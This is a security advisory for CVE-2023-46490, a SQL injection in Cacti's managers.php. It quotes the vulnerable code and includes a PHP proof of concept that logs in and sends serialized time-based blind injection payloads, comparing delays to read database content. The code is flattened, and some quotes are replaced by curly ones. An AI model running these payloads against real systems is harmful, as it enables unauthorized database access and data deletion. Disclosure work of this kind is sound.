CVE-2023-46490: CVE-2023-46490

Package cacti Affected versions <=1.2.25 Patched versions None Summary A SQL Injection vulnerability discovered in managers.php allowed authenticated users to access database information. Details SQL Injection vulnerability discovered in managers.php. In function form_actions(), request_var ‘selected_items’ is joined into into SQL statements without security checks. source code: function form_actions() { global $manager_actions, $manager_notification_actions; if (isset_request_var(‘selected_items’)) { if (isset_request_var(‘action_receivers’)) { $selected_items = cacti_unserialize(stripslashes(get_nfilter_request_var(‘selected_graphs_array’))); if ($selected_items != false) { if (get_nfilter_request_var(‘drp_action’) == ‘1’) { // delete db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(‘,’ ,$selected_items) . ')'); db_execute('DELETE FROM snmpagent_managers_notifications WHERE manager_id IN (' . implode(‘,’ ,$selected_items) . ')'); db_execute('DELETE FROM snmpagent_notifications_log WHERE manager_id IN (' . implode(‘,’ ,$selected_items) . ')'); } elseif (get_nfilter_request_var(‘drp_action’) == ‘2’) { // enable db_execute("UPDATE snmpagent_managers SET disabled = ‘’ WHERE id IN (" . implode(‘,’ ,$selected_items) . ')'); } elseif (get_nfilter_request_var(‘drp_action’) == ‘3’) { // disable db_execute("UPDATE snmpagent_managers SET disabled = ‘on’ WHERE id IN (" . implode(‘,’ ,$selected_items) . ')'); } header(‘Location: managers.php?header=false’); exit; } PoC $url = ["http://localhost/cacti/", "http://192.168.80.128/cacti/",]; $url = $url[1]; $username = 'admin’; $password = 'password’; $login = "index.php?action=login&login_username=$username&login_password=$password"; $injectSQLcode1=serialize([“1 ) or if (‘admin’ = (SELECT username FROM user_auth WHERE id = 1 ), sleep(5), 0”]); $injectSQLcode2=serialize([“1 ) or if (‘error’ = (SELECT username FROM user_auth WHERE id = 1 ), sleep(5), 0”]); $target = "managers.php?action=actions&selected_items=1&action_receivers=1&drp_action=1&selected_graphs_array="; function curlPage($url, $cookie=false){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 60); curl_setopt($curl, CURLOPT_TIMEOUT, 60); if($cookie){ curl_setopt($curl, CURLOPT_COOKIE,$cookie); } $data = curl_exec($curl); echo "[++Debug++] ".$url."\n"; curl_close($curl); return $data; } function getSQLinjectionPage(){ global $url, $login, $target, $injectSQLcode1, $injectSQLcode2; //login $data1 = curlPage($url.$login); //echo $data1."\n"; //get cookie $cookie = substr($data1, strpos($data1, 'Set-Cookie: ') + 12, 32); echo '[++Debug++] Cacti Cookie: '.$cookie."\n"; //check login $data2 = curlPage($url."index.php", $cookie); //echo substr($data2, 0, 300)."\n\n"; //time of correct test $time1 = time(); $data3 = curlPage($url.$target.urlencode($injectSQLcode1), $cookie); $time1 = time() - $time1; echo "[++result++] time of correct test: ".$time1."\n\n"; //time of error test $time2 = time(); $data3 = curlPage($url.$target.urlencode($injectSQLcode2), $cookie); $time2 = time() - $time2; echo "[++result++] time of error test: ".$time2."\n\n"; if( $time2 <=1 and $time1 >= 5){ echo "[++result++] Time difference exist, vulnerability exsit!"."\n\n"; }else{ echo "[++result++] No time difference, vulnerability not exsit"."\n\n"; } } //set ip, port, username, password, InjectCode first getSQLinjectionPage(); Impact Although there is no echo，by measuring the time delay of accessing the website, authenticated users can obtain mysql database content.